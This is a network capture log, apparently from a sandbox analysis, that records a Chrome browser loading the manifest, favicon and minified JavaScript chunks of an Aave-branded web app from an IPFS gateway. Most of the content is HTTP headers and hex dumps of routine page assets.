                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1337INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Content-Length: 353
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreibrszgipvlyol3bwely3aeqoovtbld3cnbmpcurbyckrd5oxk2mcq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/manifest.json
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreibrszgipvlyol3bwely3aeqoovtbld3cnbmpcurbyckrd5oxk2mcq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Set-Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsjepeMKzDicpk; SameSite=None; Secure; path=/; expires=Sun, 29-Sep-24 03:11:47 GMT; HttpOnly
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e434ae0f4238-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC32INData Raw: 7b 0a 20 20 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 20 22 41 61 76 65 22 2c 0a 20 20 22 6e 61 6d
                                                                                                                                                                                                                                                  Data Ascii: { "short_name": "Aave", "nam
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC321INData Raw: 65 22 3a 20 22 41 61 76 65 22 2c 0a 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4e 6f 6e 2d 63 75 73 74 6f 64 69 61 6c 20 6c 69 71 75 69 64 69 74 79 20 70 72 6f 74 6f 63 6f 6c 22 2c 0a 20 20 22 69 63 6f 6e 50 61 74 68 22 3a 20 22 61 61 76 65 2e 73 76 67 22 2c 0a 20 20 22 69 63 6f 6e 73 22 3a 20 5b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 66 61 76 69 63 6f 6e 33 32 2e 70 6e 67 22 2c 0a 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 33 32 78 33 32 22 2c 0a 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 7d 0a 20 20 5d 2c 0a 20 20 22 73 74 61 72 74 5f 75 72 6c 22 3a 20 22 2e 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 2c 0a 20 20 22 64 69 73 70 6c 61 79 22 3a 20 22 73 74 61 6e 64 61 6c 6f 6e
                                                                                                                                                                                                                                                  Data Ascii: e": "Aave", "description": "Non-custodial liquidity protocol", "iconPath": "aave.svg", "icons": [ { "src": "favicon32.png", "sizes": "32x32", "type": "image/png" } ], "start_url": "./index.html", "display": "standalon


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  89192.168.2.549808209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC766OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1212INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                                  Content-Length: 1150
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreibdwnufrw7lp4njqwcjxwubq3nz5x3qcfhop65hz7lmzdh75dpvku"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/favicon.ico
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreibdwnufrw7lp4njqwcjxwubq3nz5x3qcfhop65hz7lmzdh75dpvku
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 72691
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e4349a910f60-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC157INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 12 0b 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 c5 b7 33 ff c3 b3 36 ff c3 b0 3b ff c1 ad 3f ff c0 aa 44 ff be a6 47 ff be a3 4c ff bc 9f 50 ff bb 9d 55 ff b9 99 58 ff b9 96 5d ff b7 92 61 ff b6 8f 66 ff b4 8c 69 ff b4 89 6e ff b2 85 72 ff c3 b3 36 ff c2 b0 3b ff cb b9 5d ff c6 b3 56 ff be a6 47 ff bd a3 4c ff bc 9f 50 ff bb 9c 54
                                                                                                                                                                                                                                                  Data Ascii: h( 36;?DGLPUX]afinr6;]VGLPT
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC993INData Raw: ff b9 99 58 ff b8 96 5d ff b7 92 61 ff b6 8f 65 ff b8 92 72 ff c2 9f 8b ff b2 85 72 ff b1 82 76 ff c3 b0 3b ff c1 ad 3f ff fb f9 f2 ff ef e9 d1 ff be a3 4c ff bc 9f 50 ff bb 9d 55 ff b9 99 58 ff b9 96 5d ff b7 92 61 ff b6 8f 66 ff b4 8c 69 ff e0 cf c4 ff ff ff ff ff b7 8c 82 ff af 7e 7a ff c1 ac 3f ff c0 aa 43 ff e8 e0 be ff ff ff ff ff c5 ad 69 ff bb 9c 54 ff b9 99 58 ff b8 96 5d ff b7 92 61 ff b6 8f 65 ff b4 8b 69 ff b6 8d 74 ff fc fa f9 ff ef e5 e2 ff af 7e 7a ff ae 7b 7f ff c0 aa 44 ff be a6 47 ff cd b9 76 ff ff ff ff ff e1 d4 b5 ff b9 99 58 ff b9 96 5d ff b7 92 61 ff b6 8f 66 ff b4 8c 69 ff b4 89 6e ff d1 b6 aa ff ff ff ff ff ce b0 ad ff af 7b 7f ff ad 78 83 ff be a6 47 ff bd a3 4c ff bc 9f 50 ff f6 f1 e7 ff fb f9 f5 ff b9 98 61 ff b7 92 61 ff b6 8f
                                                                                                                                                                                                                                                  Data Ascii: X]aerrv;?LPUX]afi~z?CiTX]aeit~z{DGvX]afin{xGLPaa


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  90192.168.2.549809209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC504OUTGET /_next/static/chunks/3629-beffcb1d37e29d12.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 9876
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreib3s4g6eiukrx5npcamziub5eo3rw3jryidxcjfmoerkkd255qdf4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/3629-beffcb1d37e29d12.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreib3s4g6eiukrx5npcamziub5eo3rw3jryidxcjfmoerkkd255qdf4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028481
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC104INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 35 32 63 34 38 38 63 34 65 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4352c488c4e-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1275INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 32 39 5d 2c 7b 34 33 36 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 68 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 2c 72 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4a 7d 2c 77 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4b 7d 2c 6f 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 48 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 35 39 34 39 39 29 2c 6f 3d 74 28 34 37 33 30 29 2c 69 3d 74 28 31 32 37 39 29 2c 63 3d 74 28 36 37 32 39 34 29 2c 73 3d 74 28 34
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3629],{43629:function(e,r,t){t.d(r,{hv:function(){return W},rM:function(){return J},wD:function(){return K},ov:function(){return H}});var n=t(59499),o=t(4730),i=t(1279),c=t(67294),s=t(4
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 70 73 3a 2f 2f 64 6f 63 73 2e 61 61 76 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 73 2f 77 68 61 74 73 2d 6e 65 77 2f 73 75 70 70 6c 79 2d 62 6f 72 72 6f 77 2d 63 61 70 73 22 2c 75 6e 64 65 72 6c 69 6e 65 3a 22 61 6c 77 61 79 73 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 62 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 4c 65 61 72 6e 20 6d 6f 72 65 22 7d 29 7d 29 5d 7d 29 7d 29 29 7d 29 3a 6e 75 6c 6c 7d 2c 4f 3d 5b 22 64 65 62 74 43 65 69 6c 69 6e 67 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 72 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79
                                                                                                                                                                                                                                                  Data Ascii: ps://docs.aave.com/developers/whats-new/supply-borrow-caps",underline:"always",children:(0,b.jsx)(s.cC,{id:"Learn more"})})]})}))}):null},O=["debtCeiling"];function v(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySy
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72
                                                                                                                                                                                                                                                  Data Ascii: tySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function x(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 3f 55 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 72 2c 74 5b 72 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 74 29 29 3a 55 28 4f 62 6a 65 63 74 28 74 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 29 7d 29 29
                                                                                                                                                                                                                                                  Data Ascii: ?U(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):U(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 6e 28 72 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 46 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 64 65 62 74 43 65 69 6c 69 6e 67 2c 74 3d 65 2e 69 63 6f 6e 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2c 69 3d 28 30 2c 6f 2e 5a 29 28 65 2c 4d 29 3b 69 66 28 21 72 2e 70 65 72 63 65 6e 74 55 73 65 64 7c 7c 72 2e 70 65 72 63 65 6e 74 55 73 65 64 3c 39 38 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 63 3d 72 2e 69 73 4d 61 78 65 64 3f 22 65 72 72 6f 72 22 3a 22 77 61 72 6e 69 6e 67 22 3b 72 65 74 75 72 6e 28 30 2c 62 2e 6a 73 78
                                                                                                                                                                                                                                                  Data Ascii: n(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var F=function(e){var r=e.debtCeiling,t=e.icon,n=void 0===t||t,i=(0,o.Z)(e,M);if(!r.percentUsed||r.percentUsed<98)return null;var c=r.isMaxed?"error":"warning";return(0,b.jsx
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 28 74 2c 72 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 54 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 73 75 70 70 6c 79 43 61 70 2c 74 3d 65 2e 69 63 6f 6e 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2c 69 3d 28 30 2c 6f 2e 5a 29 28 65 2c 4c 29 3b 69 66 28 21 72 2e 70 65 72 63 65 6e 74 55 73 65 64 7c 7c 72 2e 70 65 72 63 65 6e 74 55 73 65 64 3c 39 38 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 28 30 2c 62 2e 6a 73 78 73 29 28 6d 2e 76 2c 4e 28 4e 28 7b 73 65 76 65 72 69 74 79 3a 22 77 61 72 6e 69 6e 67 22 2c 69 63 6f 6e 3a 6e 7d 2c 69 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 72 2e 69 73 4d 61 78 65 64 3f 28 30 2c 62 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 50 72 6f 74 6f 63 6f 6c 20 73 75 70
                                                                                                                                                                                                                                                  Data Ascii: (t,r))}))}return e}var T=function(e){var r=e.supplyCap,t=e.icon,n=void 0===t||t,i=(0,o.Z)(e,L);if(!r.percentUsed||r.percentUsed<98)return null;return(0,b.jsxs)(m.v,N(N({severity:"warning",icon:n},i),{},{children:[r.isMaxed?(0,b.jsx)(s.cC,{id:"Protocol sup
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 61 72 6e 28 22 3c 41 73 73 65 74 43 61 70 73 50 72 6f 76 69 64 65 72 20 2f 3e 20 77 61 73 20 6e 6f 74 20 67 69 76 65 6e 20 61 20 76 61 6c 69 64 20 72 65 73 65 72 76 65 20 61 73 73 65 74 20 74 6f 20 70 61 72 73 65 22 29 2c 6e 75 6c 6c 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 49 28 65 29 2c 74 3d 72 2e 73 75 70 70 6c 79 43 61 70 55 73 61 67 65 2c 6e 3d 72 2e 73 75 70 70 6c 79 43 61 70 52 65 61 63 68 65 64 2c 69 3d 4a 28 65 29 2c 63 3d 69 2e 62 6f 72 72 6f 77 43 61 70 55 73 61 67 65 2c 73 3d 69 2e 62 6f 72 72 6f 77 43 61 70 52 65 61 63 68 65 64 2c 61 3d 4b 28 65 29 3b 72 65 74 75 72 6e 7b 72 65 73 65 72 76 65 3a 65 2c 73 75 70 70 6c 79 43 61 70 3a 7b 70 65 72 63 65 6e 74 55 73 65 64 3a 74 2c 69 73 4d 61 78 65 64 3a 6e 2c 64
                                                                                                                                                                                                                                                  Data Ascii: arn("<AssetCapsProvider /> was not given a valid reserve asset to parse"),null;var n=function(e){var r=I(e),t=r.supplyCapUsage,n=r.supplyCapReached,i=J(e),c=i.borrowCapUsage,s=i.borrowCapReached,a=K(e);return{reserve:e,supplyCap:{percentUsed:t,isMaxed:n,d
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC387INData Raw: 29 3a 30 3b 72 65 74 75 72 6e 7b 73 75 70 70 6c 79 43 61 70 55 73 61 67 65 3a 72 3d 72 3d 3d 3d 31 2f 30 3f 30 3a 72 2c 73 75 70 70 6c 79 43 61 70 52 65 61 63 68 65 64 3a 72 3e 3d 39 39 2e 39 39 7d 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 3f 31 30 30 2a 28 30 2c 69 2e 68 45 29 28 65 2e 74 6f 74 61 6c 44 65 62 74 29 2e 64 69 76 69 64 65 64 42 79 28 65 2e 62 6f 72 72 6f 77 43 61 70 29 2e 74 6f 4e 75 6d 62 65 72 28 29 3a 30 3b 72 65 74 75 72 6e 7b 62 6f 72 72 6f 77 43 61 70 55 73 61 67 65 3a 72 3d 72 3d 3d 3d 31 2f 30 3f 30 3a 72 2c 62 6f 72 72 6f 77 43 61 70 52 65 61 63 68 65 64 3a 72 3e 3d 39 39 2e 39 39 7d 7d 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 3f 31 30 30 2a 28 30 2c 69 2e 68 45 29 28 65 2e 69 73
                                                                                                                                                                                                                                                  Data Ascii: ):0;return{supplyCapUsage:r=r===1/0?0:r,supplyCapReached:r>=99.99}},J=function(e){var r=e?100*(0,i.hE)(e.totalDebt).dividedBy(e.borrowCap).toNumber():0;return{borrowCapUsage:r=r===1/0?0:r,borrowCapReached:r>=99.99}},K=function(e){var r=e?100*(0,i.hE)(e.is


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  91192.168.2.549810209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC504OUTGET /_next/static/chunks/4254-ac0dd33f5ae839d3.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
